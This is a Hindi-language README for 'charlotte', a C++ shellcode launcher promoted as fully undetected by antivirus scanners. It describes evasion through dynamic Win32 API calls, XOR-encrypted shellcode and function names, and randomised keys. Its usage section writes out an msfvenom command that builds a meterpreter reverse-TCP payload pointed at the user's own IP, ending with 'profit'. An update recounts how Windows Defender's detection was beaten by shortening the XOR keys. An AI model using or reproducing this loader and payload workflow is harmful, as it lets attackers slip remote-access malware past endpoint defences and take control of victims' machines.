charlotte
c++ पूरी तरह से अनडिटेक्टेड शेलकोड लॉन्चर ;)
इसे अपने नवजात शिशु के जन्म के उपलक्ष्य में जारी कर रहा हूँ
विवरण
13/05/2021:
- c++ शेलकोड लॉन्चर, 13 मई 2021 तक पूरी तरह से अनडिटेक्टेड 0/26।
- win32 API फ़ंक्शन का डायनामिक इनवोकिंग
- शेलकोड और फ़ंक्शन नामों का XOR एन्क्रिप्शन
- प्रति रन रैंडमाइज़्ड XOR कुंजियाँ और वेरिएबल्स
- Kali Linux पर, बस 'apt-get install mingw-w64*' और बस!
17/05/2021:
- रैंडम स्ट्रिंग्स की लंबाई और XOR कुंजियों की लंबाई
antiscan.me

उपयोग
रिपॉजिटरी को क्लोन करें, अपना शेलकोड फ़ाइल beacon.bin नाम से जनरेट करें, और charlotte.py चलाएं।
उदाहरण:
- git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
- cd charlotte
- msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
- python charlotte.py
- profit
msfvenom -p के साथ परीक्षण किया गया (नीचे .gif POC में दिखाया गया है) और कोबाल्ट स्ट्राइक रॉ फॉर्मेट पेलोड के साथ भी

अपडेट v1.1
17/05/21:
जाहिर तौर पर Microsoft Windows Defender .DLL बाइनरी का पता लगाने में सक्षम था,
और उन्होंने इसे कैसे फ्लैग किया? 16 बाइट आकार की कई XOR कुंजियों को देखकर।
इसे 9 में बदलने पर, नीचे POC .gif में दिखाया गया है, यह अब फिर से अनडिटेक्टेड है।
चियर्स!
